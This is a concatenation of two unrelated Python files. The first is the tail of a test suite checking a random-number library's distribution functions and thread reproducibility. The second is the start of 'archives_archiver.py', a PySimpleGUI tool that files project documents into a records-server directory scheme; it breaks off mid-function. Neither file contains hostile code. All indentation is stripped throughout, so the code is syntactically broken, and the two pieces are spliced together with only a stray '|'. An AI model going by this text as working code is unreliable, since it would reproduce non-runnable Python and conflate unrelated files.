assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.set_seed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, 0)
assert_raises(ValueError, hypergeom, 10, 10, 25)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = random.logseries
desired = np.array([1, 1, 1])
self.set_seed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread(object):
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [
Thread(target=function, args=(random.RandomState(s), o))
for s, o in zip(self.seeds, out1)
]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.0] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput(object):
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (
random.exponential,
random.standard_gamma,
random.chisquare,
random.standard_t,
random.pareto,
random.weibull,
random.power,
random.rayleigh,
random.poisson,
random.zipf,
random.geometric,
random.logseries,
)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (
random.uniform,
random.normal,
random.beta,
random.gamma,
random.f,
random.noncentral_chisquare,
random.vonmises,
random.laplace,
random.gumbel,
random.logistic,
random.lognormal,
random.wald,
random.binomial,
random.negative_binomial,
)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular, random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
# Ensure returned array dtype is corect for platform
def test_integer_dtype(int_func):
random.seed(123456789)
fname, args, md5 = int_func
f = getattr(random, fname)
actual = f(*args, size=2)
assert_(actual.dtype == np.dtype("l"))
def test_integer_repeat(int_func):
random.seed(123456789)
fname, args, md5 = int_func
f = getattr(random, fname)
val = f(*args, size=1000000)
if sys.byteorder != "little":
val = val.byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(res == md5)
def test_aliases():
mtrand = randomgen.mtrand
assert isinstance(mtrand.random_sample(), float)
assert isinstance(mtrand.sample(), float)
assert isinstance(mtrand.ranf(), float)
|
archives_archiver.py | import base64
import os
import logging
import random
import re
import subprocess
import shutil
import sqlite3
import sys
import threading
import time
import pandas as pd
import PySimpleGUI as sg
from dateutil import parser
from contextlib import closing
from typing import List, Dict
from thefuzz import fuzz
from collections import defaultdict
from datetime import datetime
# Version Number
__version__ = 1.48
# Typing Aliases
# pysimplegui_layout
# Environmental Variables
RECORDS_SERVER_LOCATION = r"""R:\\""" #TODO how to prevent the four backslashes
FILENAMES_TO_IGNORE = ["desktop.ini", "desktop.ini"]
DIRECTORY_CHOICES = ['A - General', 'B - Administrative Reviews and Approvals', 'C - Consultants',
'D - Environmental Review Process', 'E - Program and Design',
'F - Bid Documents and Contract Award', 'G - Construction', "H - Submittals and O&M's",
'A1 - Miscellaneous', 'A2 - Working File', 'A3 - Project Directory Matrix & Project Chronology',
"B1 - CPS and Chancellor's Approvals", 'B11 - LEED', 'B12 - Outside Regulatory Agencies',
'B13 - Coastal Commission', 'B2 - Office of the President UC Regents',
'B3 - State Public Works Board', 'B4 - Department of Finance', 'B5 - Legislative Submittals',
'B6 - State Fire Marshal', 'B7 - Office of State Architect (DSA)', 'B8 - General Counsel',
'B8.1 - General Counsel - Confidential', 'C1 - Executive Architect', 'C1.1 - Selection',
'C1.2 - Correspondence', 'C1.3 - Agreement', 'C2 - Other Consultants', 'C2.1 - Selection',
'C2.2 - Correspondence', 'C2.3 - Agreement', 'D1 - Environmental Correspondences',
'D2 - EIC Forms', 'D3 - CEQA Documentation', 'D4 - Mitigation Monitoring Program', 'E1 - DPP',
'E2 - PPG', 'E3 - Budget Cost Estimates', 'E4 - Planning Schedules',
'E5 - Program and Design Correspondences', 'E5.1 - Executive Architect Correspondences',
'E5.2 - Special Consultants', 'E5.3 - Users. Building Committee. Campus Correspondences',
'E5.4 - PPC and PP', 'E5.5 - Office of the President to.from', 'E5.6 - Building Committee to.from',
'E5.7 - Other', 'E5.8 - Office of General Counsel', 'E6 - Reports (soils, structural, calcs)',
'E7 - Value Engineering', 'E7.1 - Value Engineering Correspondence',
'E7.2 - VE Workshop Minutes, Summaries, Final Reports', 'E8 - Program and Design Meeting Minutes',
'F1 - Bid and Contract Award Correspondence', 'F1.1 - Executive Architect Correspondences',
'F1.2 - Special Consultants Correspondences', 'F1.4 - PPC and PP',
'F1.5 - Office of the President Correspondences', 'F1.6 - General Counsel Correspondences',
'F1.7 - Pre-Qualification', 'F1.8 - Other', 'F10 - Escrow Agreement',
'F2 - Reviews', 'F2.1 - Constructibility, Code Reviews', 'F2.2 - In-house. PP reviews',
'F3 - Structural, Title 24, Mech Calculations', 'F4 - Plan Deposits, Planholders, Ads for Bid',
'F2.3 - Independent Cost Review', 'F2.4 - Independent Seismic Review', 'F2.5 - Other',
'F5 - Drawings and Spec', 'F7 - Bid Summary Forms', 'F7.1 - Bid Protest', 'F8 - Contract',
'F9 - Builders Risk Insurance', 'G1 - Construction Correspondence',
'G1.1 - Contractor Correspondences', 'G1.2 - Executive Architect Correspondences',
'G1.3 - Users.Building Committee.Campus Correspondences', 'G1.4 - PPC and PP. Certified Payroll',
'G1.5 - Geotechnical Engineer Correspondences',
'G1.6 - Testing and Inspection to Laboratory Correspondences',
'G1.7 - General Counsel Correspondences', 'G1.8 - Other',
'G10 - Testing and Inspection Reports.Other',
'G11 - Proposal Requests. Bulletins. Contractors Response', 'G12 - Request for Information RFI',
'G13 - Letter of Instruction LOI', 'G14 - User Request Change in Scope', 'G15 - Change Order',
'G16 - Field Orders', 'G17 - Warranties and Guarantees', 'G18 - Punchlist',
'G19 - Notice of Completion', 'G2 - Certificate of Payment', 'G20 - Warranty Deficiency',
'G21 - Construction Photos', 'G22 - Claims. Public Records Act', 'G22.1 - Claims Confidential',
'G23 - Commissioning', 'G24 - Building Permits', "G3 - Contractor's Schedule and Updates",
'G4 - Progress Meeting Notes', 'G5 - UCSC Inspectors Daily Reports', 'G5.1 - Hot Work Permits',
'G6 - UCSC Memoranda', 'G6.1 - Architects Field Reports', 'G7 - Contractors Daily Reports',
'G8 - Testing and Inspection Reports. Geotechnical Engineer',
'G9 - Testing and Inspection Reports. Testing Laboratory']
class ArchiverUtilities:
@staticmethod
def split_path(path):
'''splits a path into each piece that corresponds to a mount point, directory name, or file'''
allparts = []
while 1:
parts = os.path.split(path)
if parts[0] == path: # sentinel for absolute paths
allparts.insert(0, parts[0])
break
elif parts[1] == path: # sentinel for relative paths
allparts.insert(0, parts[1])
break
else:
path = parts[0]
allparts.insert(0, parts[1])
return allparts
@staticmethod
def prefixes_from_project_number(project_no: str):
"""
returns root directory prefix for given project number.
eg project number 10638 returns 106xx, project number 9805A returns 98xx
:param project_no: string project number
:return: project directory root directory prefix for choosing correct root directory
"""
project_no = project_no.split("-")[0]
project_no = ''.join(i for i in project_no if i.isdigit())
prefix = project_no[:3]
if len(project_no) <= 4:
prefix = project_no[:2]
return prefix + 'xx', project_no
@staticmethod
def file_code_from_destination_dir(destination_dir_name):
"""
:param destination_dir_name: full destination directory name
:return: string filing code
"""
file_code = ''
dir_name_index = 0
while destination_dir_name[dir_name_index] != '-':
file_code += destination_dir_name[dir_name_index]
dir_name_index += 1
return file_code.strip().upper()
@staticmethod
def open_file_with_system_application(filepath):
"""
System agnostic file opener
:param filepath: str path to file that will be opened
:return:
"""
system_identifier = sys.platform
if system_identifier.lower().startswith("linux"):
subprocess.call(('xdg-open', filepath))
return
if system_identifier.lower().startswith("darwin"):
subprocess.call(('open', filepath))
return
else:
os.startfile(filepath)
return
@staticmethod
def clean_path(path: str):
"""
Process a path string such that it can be used regardless of the os and regardless of whether its length
surpasses the limit in windows file systems
:param path:
:return:
"""
path = path.replace('/', os.sep).replace('\\', os.sep)
if os.sep == '\\' and '\\\\?\\' not in path:
# fix for Windows 260 char limit
relative_levels = len([directory for directory in path.split(os.sep) if directory == '..'])
cwd = [directory for directory in os.getcwd().split(os.sep)] if ':' not in path else []
path = '\\\\?\\' + os.sep.join(cwd[:len(cwd) - relative_levels] \
+ [directory for directory in path.split(os.sep) if directory != ''][
relative_levels:])
return path
@staticmethod
def is_valid_email(potential_email: str):
email_regex = r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
return re.fullmatch(email_regex, potential_email)
@staticmethod
def cleanse_filename(proposed_filename: str):
"""removes illegal filename chars"""
clean_filename = proposed_filename.strip()
clean_filename = clean_filename.replace('\n','')
clean_filename = "".join(i for i in clean_filename if i not in "\/:*?<>|")
return clean_filename
@staticmethod
def project_number_from_path(file_path):
"""
Extracts a project number from a path
:param file_path:
:return: project number string
"""
path_list = ArchiverUtilities.split_path(file_path)
project_number = None
xx_level_idx = None
proj_number_directory = None
for idx, path_dir in enumerate(path_list):
if 'xx' in path_dir and not xx_level_idx:
xx_level_idx = idx
continue
if not xx_level_idx:
continue
if idx - 1 == xx_level_idx:
if path_dir[0].isdigit() and path_dir[1].isdigit() and path_dir[2].isdigit():
project_number = path_dir.split(" ")[0]
proj_number_directory = path_dir
else:
project_number = None
break
if idx - 2 == xx_level_idx:
if project_number in path_dir:
project_number = path_dir.split(" ")[0]
return project_number
class GuiHandler:
"""
This class is used to create and launch the various GUI windows used by the script.
"""
def __init__(self, file_icon_path = None, folder_icon_path = None):
self.gui_theme = random.choice(["DarkTeal6", "Green", "LightBrown11", "LightPurple", "SandyBeach", "DarkGreen4",
"BluePurple", "Reddit", "DarkBrown5", "DarkBlue8", "LightGreen6", "LightBlue7",
"DarkGreen2", "Kayak", "LightBrown3", "LightBrown1", "LightTeal", "Tan",
"TealMono", "LightBrown4", "LightBrown3", "LightBrown2", "DarkPurple4",
"DarkPurple", "DarkGreen5", "Dark Brown3", "DarkAmber", "DarkGrey6",
"DarkGrey2", "DarkTeal1", "LightGrey6", "DarkBrown6"])
self.window_close_button_event = "-WINDOW CLOSE ATTEMPTED-"
self.file_icon = None
self.folder_icon = None
if file_icon_path:
with open(file_icon_path, "rb") as image:
self.file_icon = base64.b64encode(image.read())
if folder_icon_path:
with open(folder_icon_path, "rb") as image:
self.folder_icon = base64.b64encode(image.read())
def make_window(self, window_name: str, window_layout: list):
sg.theme(self.gui_theme)
# launch gui
window = sg.Window(window_name, layout= window_layout, enable_close_attempted_event= True)
event, values = window.read()
window.bring_to_front()
values["Button Event"] = event
window.close()
return defaultdict(None, values)
def directory_treedata(self, parent_dir, dir_name) -> sg.TreeData:
"""
Creates PysimpleGUI.TreeData ogjects from a given directory
https://github.com/PySimpleGUI/PySimpleGUI/blob/master/DemoPrograms/Demo_Tree_Element.py
:param parent_dir:
:param dir_name:
:return:
"""
def add_files_in_folder(treedata: sg.TreeData, parent, dirname, file_icon_bytes=None, folder_icon_bytes=None):
files = os.listdir(dirname)
for f in files:
fullpath = ArchiverUtilities.clean_path(os.path.join(dirname, f))
if os.path.isdir(fullpath): # if it's a folder, add folder and recurse
# add folder to tree
treedata.insert(parent, fullpath, f, values=[], icon= folder_icon_bytes)
add_files_in_folder(treedata, fullpath, fullpath, file_icon_bytes=file_icon_bytes,
folder_icon_bytes=folder_icon_bytes)
else:
# add file to tree
treedata.insert(parent, fullpath, f, values=[os.stat(fullpath).st_size / 1000], icon= file_icon_bytes)
tree_data = sg.TreeData()
add_files_in_folder(tree_data, parent=parent_dir, dirname=dir_name, file_icon_bytes=self.file_icon,
folder_icon_bytes=self.folder_icon)
return tree_data
def welcome_layout(self, version_number = __version__):
welcome_gui_layout = [
[sg.Text(f"Archives_Archiver Version: {version_number}")],
[sg.Text("Email address:"), sg.Input(key="Archivist Email")],
[sg.Button("Ok"), sg.Button("Exit")]
]
return welcome_gui_layout
def destination_choice_layout(self, dir_choices: list[str], current_filename: str, default_project_num: str = None,
research_default: bool = False):
dir_choices.sort()
# TODO try auto_size_text and expand_y
listbox_width = max([len(dir_name) for dir_name in dir_choices])
listbox_height = 18
destination_gui_layout = [
[sg.Text(f"Choose a location for:")],
[sg.Input(default_text=current_filename, use_readonly_for_disable=True, disabled=True,
background_color='#F7F3EC', text_color="black", key='Inert Filename'), sg.Button("Open Copy")],
[sg.Text("Default Project:"), sg.Text(default_project_num)],
[sg.Text("Project Number (Leave Blank to use Default.):"), sg.Input(key="New Project Number")],
[sg.Text("Destination filename"), sg.Input(key="Filename")],
[sg.Text("Document date:"), sg.Input(key="Document Date")],
[sg.Text("Choose Directory to for file:"), sg.Listbox(values=dir_choices, key="Directory Choice",
size=(listbox_width, listbox_height))],
[sg.Text("Alternatively, Enter the full path to directory where the file has been archived:")],
[sg.Input(key="Manual Path")],
[sg.Checkbox(text="Include research with confirmation", default=research_default, key="Research")],
[sg.Text("Notes: ")],
[sg.Input(key="Notes")]
]
destination_gui_layout.append([sg.Button("Ok"), sg.Button("Exit")])
return destination_gui_layout
def confirmation_layout(self, destination_path: str, destination_tree_data: sg.TreeData = None,
similar_files: List[str]=[], dir_trees: Dict[str, sg.TreeData] = {}):
"""
:param destination_path:
:param similar_files:
:param dir_trees:
:return:
"""
confirmation_gui_layout = [
[sg.Text("Confirm this is correct location for this file:"), sg.Input(default_text=destination_path,
size=(len(destination_path),),
use_readonly_for_disable=True,
disabled=True,
background_color='#F7F3EC',
text_color="black",
key='Inert Destination Path')]]
if destination_tree_data:
destination_tree_element = sg.Tree(data=destination_tree_data,
headings=['Size (KB)', ],
auto_size_columns=True,
select_mode=sg.TABLE_SELECT_MODE_EXTENDED,
num_rows=6,
col0_width=40,
row_height=32,
show_expanded=False,
enable_events=False,
expand_x=True,
expand_y=True,
)
confirmation_gui_layout.append([sg.Text("Destination Directory Contents: "), destination_tree_element])
if similar_files or dir_trees:
confirmation_gui_layout.append([sg.HorizontalSeparator(pad=0)])
confirmation_gui_layout.append([sg.Text("Research Results", size=(len(destination_path), 2), justification='center',
font=('bold'))])
#if there is a list of similarly named files
if similar_files:
confirmation_gui_layout.append([sg.Text("Similar Filenames: ")])
filepaths_text = ", \n".join(similar_files)
confirmation_gui_layout.append([sg.Text(filepaths_text)])
#create and append directory example structures into layout
if dir_trees:
confirmation_gui_layout.append([sg.Text("Examples of directories with the same filing codes: ")])
tab_group_layout = []
for tree_path, tree in dir_trees.items():
#only use max of three examples
if len(tab_group_layout) == 3:
break
tree_element = sg.Tree(data= tree,
headings=['Size (KB)', ],
auto_size_columns=True,
select_mode=sg.TABLE_SELECT_MODE_EXTENDED,
num_rows=6,
col0_width=40,
row_height= 32,
show_expanded=False,
enable_events=False,
expand_x=True,
expand_y=True,
)
tab_group_layout.append(sg.Tab(tree_path, layout=[[tree_element]]))
confirmation_gui_layout.append([sg.TabGroup([tab_group_layout])])
confirmation_gui_layout += [
[sg.Button("Ok"), sg.Button("Back"), sg.Button("Exit")]
]
return confirmation_gui_layout
def failed_destination_layout(self, fail_reason: str, fail_path: str):
failed_gui_layout = [
[sg.Text("Could not reconcile the given destination choice:")],
[sg.Text(fail_path)],
[sg.Text("Reason for not being able to move file to selected destination:")],
[sg.Text(fail_reason)],
[sg.Button("Back"), sg.Button("Exit")]
]
return failed_gui_layout
def info_message_layout(self, info_message: str, error: bool = False):
"""
:param info_message: Message for window
:param error: whether the info message is error
:return:
"""
info_gui_layout = [
[sg.Text(info_message)],
[sg.Button("Back"), sg.Button("Exit")]
]
if error:
info_gui_layout = [[sg.Text("Oops, an error occured:")]] + info_gui_layout
return info_gui_layout
def loading_screen(self, long_func, loading_window_name: str, loading_text: str):
"""
This function opens a simply test window for the duration of the long-func function.
It cannot return a value; long_func would need to be written to avoid having to use its return value.
:param long_func: the function during which the loading screen will render.
:param loading_window_name: text along the top of the window
:param loading_text: Text that appears within the window
:return: None
"""
sg.theme(self.gui_theme)
layout = [[sg.Text(loading_text)]]
window = sg.Window(loading_window_name, layout)
def close_window_after_function(some_func):
time.sleep(.001)
some_func()
window.write_event_value('-THREAD DONE-', '')
threading.Thread(target=close_window_after_function, args=(long_func,), daemon=True).start()
while True:
event, values = window.read()
window.bring_to_front()
if event in (sg.WIN_CLOSED, '-THREAD DONE-'):
window.close()
return
class ArchivalFile:
def __init__(self, current_path: str, project: str = None, destination_path: str = None, new_filename: str = None,
notes: str = None, destination_dir: str = None, document_date: str = None):
"""
:param current_path: path to file
:param project: project number string
:param destination_path: the desired path for the file when tit is archived
:param new_filename: optional file name for the destination file
:param notes: for recording notes in the database
:param destination_dir: chosen directory from the directory templates
"""
self.current_path = current_path
self.size = 0
if self.current_path and os.path.exists(self.current_path):
self.size = str(os.path.getsize(current_path))
self.project_number = project
self.destination_dir = destination_dir
self.new_filename = new_filename
self.notes = notes
self.cached_destination_path = destination_path
self.datetime_archived = None
self.file_code = None
if destination_dir:
self.file_code = ArchiverUtilities.file_code_from_destination_dir(destination_dir)
self.document_date = None
if document_date:
self.document_date = parser.parse(document_date)
def assemble_destination_filename(self):
"""
returns the resulting anticipated filename from an anticipated archival process. Handles extensions by copying
them from current filename to desired new filename
:return:
"""
current_filename = ArchiverUtilities.split_path(self.current_path)[-1]
dest_filename = current_filename
if self.new_filename:
dest_filename = self.new_filename
extension = current_filename.split(".")[-1]
split_dest_components = dest_filename.split(".")
# if the destination filename didn't include the file extwension add it to the filename component list
if not split_dest_components[-1] == extension:
split_dest_components.append(extension)
prefix_list = [self.project_number, self.file_code]
split_dest_components = prefix_list + split_dest_components
destination_filename = ".".join(split_dest_components)
return destination_filename
def nested_large_template_destination_dir(self):
"""
eg "E - Program and Design\E5 - Correspondence"
:return:
"""
# TODO handle situation when there is a cached_destination_path but no destination_dir_name
nested_dirs = self.destination_dir
if nested_dirs[1].isdigit():
# a directory from DIRECTORY_CHOICES is parent directory if it shares same first char and doesn't have a
# digit in second char position
is_parent_dir = lambda child_dir, dir: dir[0] == child_dir[0] and not dir[1].isdigit()
parent_dir = [dir for dir in DIRECTORY_CHOICES if is_parent_dir(nested_dirs, dir)][0]
nested_dirs = os.path.join(parent_dir, nested_dirs)
return str(nested_dirs)
def get_destination_path(self):
"""
Major function that builds a plausible path string in the following steps:
Step 1: If it already has a cached destination path, return that
Step 2: Looks for xx directory in root (RECORDS_SERVER_LOCATION) and adds to path
Step 3: Looks through next two levels in directory hierarchy for directories that start with the project number
or a project number prefix and add them to the path.
Step 4: Looks for desired directory location in nested levels and adds it to new path
...unless there is already a path in cached_destination_path attribute, in which case that will be returned
:return: string (or path object?)
"""
def list_of_child_dirs(parent_directory_path):
"""sub-function for getting a list of just the child directories given a parent directory path"""
return [dir for dir in os.listdir(parent_directory_path) if
not os.path.isfile(os.path.join(parent_directory_path, dir))]
def path_from_project_num_dir_to_destination(path_to_project_num_dir: str, large_template_destination: str,
destination_filename: str):
"""
Sub-routine for constructing the remainder of the destination path after building the path up to the
directory corresponding to the archive file project number.
:param path_to_project_num_dir: path thus constructed to the directory corresponding to the archive file
project number
:param large_template_destination: given by ArchivalFile.nested_large_template_destination_dir()
:param destination_filename: given by ArchivalFile.assemble_destination_filename()
:return: string final destination path
"""
new_path = path_to_project_num_dir
# if the path to the dir corresponding to the project number doesn't exist, just return the completed
# destination filepath
if not os.path.exists(new_path):
new_path = os.path.join(new_path, large_template_destination)
return os.path.join(new_path, destination_filename)
new_path_dirs = list_of_child_dirs(new_path)
destination_dir = ArchiverUtilities.split_path(large_template_destination)[-1]
destination_dir_prefix = destination_dir.split(" ")[0] + " - " # eg "F5 - ", "G12 - ", "H - ", etc
destination_dir_parent_dir = ArchiverUtilities.split_path(large_template_destination)[0]
# if the destination directory is a large template child director...
if not destination_dir_parent_dir == large_template_destination:
# need to extrapolate the parent directory prefix given the desired destination directory. eg for
# destination "F5 - Drawings and Specifications" the parent directory prefix is "F - "
destination_dir_parent_dir_prefix = destination_dir_parent_dir.split(" ")[0] + " - " # eg "F - ", "G - ", etc
parent_dirs = [dir_name for dir_name in new_path_dirs if
dir_name.upper().startswith(destination_dir_parent_dir_prefix.upper())]
if len(parent_dirs) > 0:
# TODO cause we're lazy we'll just assume parent_dirs is only len = 1. Maybe should handle other situations?
new_path = os.path.join(new_path, parent_dirs[0])
new_path_dirs = [dir_name for dir_name in os.listdir(new_path) if
not os.path.isfile(os.path.join(new_path, dir_name))]
existing_destination_dirs = [dir_name for dir_name in new_path_dirs if
dir_name.upper().startswith(destination_dir_prefix)]
if existing_destination_dirs:
# again, assuming only one dir matches the destination dir prefix:
new_path = os.path.join(new_path, existing_destination_dirs[0])
else:
new_path = os.path.join(new_path, destination_dir)
# if there is no directory in the destination project folder that corresponds to the parent directory of
# destination directory in a large template path...
else:
# check for existing equivalents of destination directory
new_path_dirs = list_of_child_dirs(new_path)
existing_destination_dirs = [dir_name for dir_name in new_path_dirs if
dir_name.upper().startswith(destination_dir_prefix)]
if existing_destination_dirs:
new_path = os.path.join(new_path, existing_destination_dirs[0])
else:
project_num_dirs = [dir for dir in new_path_dirs if dir.lower().startswith(self.project_number)]
if not project_num_dirs:
new_path = os.path.join(new_path, large_template_destination)
else:
new_path = os.path.join(new_path, project_num_dirs[0])
return path_from_project_num_dir_to_destination(path_to_project_num_dir=new_path,
large_template_destination=large_template_destination,
destination_filename=destination_filename)
# if the destination_dir_name doesn't have a project template dir parent...
else:
existing_destination_dirs = [dir_name for dir_name in new_path_dirs if
dir_name.upper().startswith(destination_dir_prefix)]
if existing_destination_dirs:
new_path = os.path.join(new_path, existing_destination_dirs[0])
else:
file_num_dirs = [dir for dir in new_path_dirs if
dir.lower().startswith(self.project_number.lower())]
if not file_num_dirs:
new_path = os.path.join(new_path, large_template_destination)
else:
return path_from_project_num_dir_to_destination(path_to_project_num_dir=new_path,
large_template_destination=large_template_destination,
destination_filename=destination_filename)
return os.path.join(new_path, destination_filename)
############### Start of get_destination_path() #################
if not self.cached_destination_path:
# sept
xx_level_dir_prefix, project_num_prefix = ArchiverUtilities.prefixes_from_project_number(self.project_number)
root_directories_list = list_of_child_dirs(RECORDS_SERVER_LOCATION)
matching_root_dirs = [dir_name for dir_name in root_directories_list if
dir_name.lower().startswith(xx_level_dir_prefix.lower())]
# if we have more than one matching root dir we throw an error
if len(matching_root_dirs) != 1:
raise Exception(
f"{len(matching_root_dirs)} matching directories in {RECORDS_SERVER_LOCATION} for project number {self.project_number}")
# add the directory matching the xx level prefix for this project number
new_path = os.path.join(RECORDS_SERVER_LOCATION, matching_root_dirs[0])
# list of contents of xx level directory which are not files (ie directories in xx level directory)
xx_dir_dirs = list_of_child_dirs(new_path)
# lambda functions that check whether a directory name starts with either project number or
# prefix respectively.
proj_num_in_dir_name = lambda dir_name: self.project_number == dir_name.split(" ")[0]
prefix_in_dir_name = lambda dir_name: project_num_prefix == dir_name.split(" ")[0]
dirs_matching_proj_num = [dir_name for dir_name in xx_dir_dirs if proj_num_in_dir_name(dir_name)]
# if more than one directory starts with the same project number...
if len(dirs_matching_proj_num) > 1:
raise Exception(
f"{len(dirs_matching_proj_num)} matching directories in {new_path} for project number {self.project_number}; expected 0 or 1.")
# if no directories match the project number...
if len(dirs_matching_proj_num) == 0:
dirs_matching_prefix = [dir_name for dir_name in xx_dir_dirs if prefix_in_dir_name(dir_name)]
if len(dirs_matching_prefix) > 1:
raise Exception(
f"{len(dirs_matching_prefix)} matching directories in {new_path} for prefix for project number {self.project_number}; expected 0 or 1.")
# if there is now project number or prefix directory at the 'xx' level, it will need to be made
if len(dirs_matching_prefix) == 0:
new_path = os.path.join(new_path, project_num_prefix)
new_path = os.path.join(new_path, self.project_number)
new_path = os.path.join(new_path, self.nested_large_template_destination_dir())
new_path = os.path.join(new_path, self.assemble_destination_filename())
self.cached_destination_path = new_path
return new_path
if len(dirs_matching_prefix) == 1:
# if a dir exists that does begin with the prefix, we'll add it to our path and look again for
# directories that begin with the project number #TODO ..and prefix again too?
new_path = os.path.join(new_path, dirs_matching_prefix[0])
prefix_dir_dirs = list_of_child_dirs(new_path)
dirs_matching_proj_num = [dir_name for dir_name in prefix_dir_dirs if
proj_num_in_dir_name(dir_name)]
if len(dirs_matching_proj_num) > 1:
logging.exception(
f"{len(dirs_matching_proj_num)} matching directories in {new_path} for project number {self.project_number}; expected 0 or 1.",
exc_info=True)
return ''
# if no dirs are equivalent to the project number
if len(dirs_matching_proj_num) == 0:
new_path = os.path.join(new_path, self.project_number)
new_path = path_from_project_num_dir_to_destination(new_path,
self.nested_large_template_destination_dir(),
self.assemble_destination_filename())
self.cached_destination_path = new_path
return self.cached_destination_path
if len(dirs_matching_proj_num) == 1:
new_path = os.path.join(new_path, dirs_matching_proj_num[0])
new_path = path_from_project_num_dir_to_destination(new_path,
self.nested_large_template_destination_dir(),
self.assemble_destination_filename())
self.cached_destination_path = new_path
return self.cached_destination_path
# if we do find a dir that corresponds with the project number...
if len(dirs_matching_proj_num) == 1:
new_path = os.path.join(new_path, dirs_matching_proj_num[0])
#look for another project number directory in the dirs of this project number directory
proj_num_dir_dirs = list_of_child_dirs(new_path)
dirs_matching_proj_num = [dir_name for dir_name in proj_num_dir_dirs if proj_num_in_dir_name(dir_name)]
# if more than one directory starts with the same project number...
if len(dirs_matching_proj_num) not in (0,1):
raise Exception(
f"{len(dirs_matching_proj_num)} matching directories in {new_path} for project number {self.project_number}; expected 0 or 1.")
if len(dirs_matching_proj_num) == 0:
new_path = os.path.join(new_path, self.project_number)
if len(dirs_matching_proj_num) == 1:
new_path = os.path.join(new_path, dirs_matching_proj_num[0])
new_path = path_from_project_num_dir_to_destination(path_to_project_num_dir= new_path,
large_template_destination= self.nested_large_template_destination_dir(),
destination_filename= self.assemble_destination_filename())
self.cached_destination_path = new_path
return self.cached_destination_path
self.cached_destination_path = new_path
return self.cached_destination_path
def attribute_defaultdict(self):
date_stamp = ''
doc_date = ''
if self.datetime_archived:
date_stamp = self.datetime_archived.strftime("%m/%d/%Y, %H:%M:%S")
if self.document_date:
doc_date = self.document_date.strftime("%m/%d/%Y, %H:%M:%S")
if (self.get_destination_path() or self.current_path) and not self.size:
if not os.path.isfile(self.get_destination_path()):
self.size = str(os.path.getsize(self.current_path))
else:
self.size = str(os.path.getsize(self.get_destination_path()))
#if we don't have a file code, generate one from the destination
if self.destination_dir and not self.file_code:
self.file_code = ArchiverUtilities.file_code_from_destination_dir(self.destination_dir)
if not self.project_number:
self.project_number = ArchiverUtilities.project_number_from_path(self.get_destination_path())
attribute_dict = {"date_archived": date_stamp, "project_number": self.project_number,
"destination_path": self.get_destination_path(), "document_date": doc_date,
"destination_directory": self.destination_dir, "file_code": self.file_code,
"file_size": self.size, "notes": self.notes}
return defaultdict(lambda: None, attribute_dict)
def check_permissions(self):
"""
Returns a string describing issues with permissions that may arise when trying to archive the file.
:return:
"""
if not os.path.exists(self.current_path):
return f"The file no longer exists {self.current_path}"
issues_found = ''
try:
os.rename(self.current_path, self.current_path)
except OSError as e:
issues_found = "Access error on file using renaming test:" + '! \n' + str(e) + "\n"
if not os.access(self.current_path, os.R_OK):
issues_found += "No read access for the file.\n"
if not os.access(self.current_path, os.W_OK):
issues_found += "No write access for the file.\n"
if not os.access(self.current_path, os.X_OK):
issues_found += "No execution access for the file.\n"
return issues_found
def archive(self):
# if the file has already been archived return the destination path
if self.datetime_archived:
return self.get_destination_path()
destination_path_list = ArchiverUtilities.split_path(self.get_destination_path())
destination_dir_path = os.path.join(*destination_path_list[:-1])
if not os.path.exists(destination_dir_path):
os.makedirs(destination_dir_path)
self.datetime_archived = datetime.now()
try:
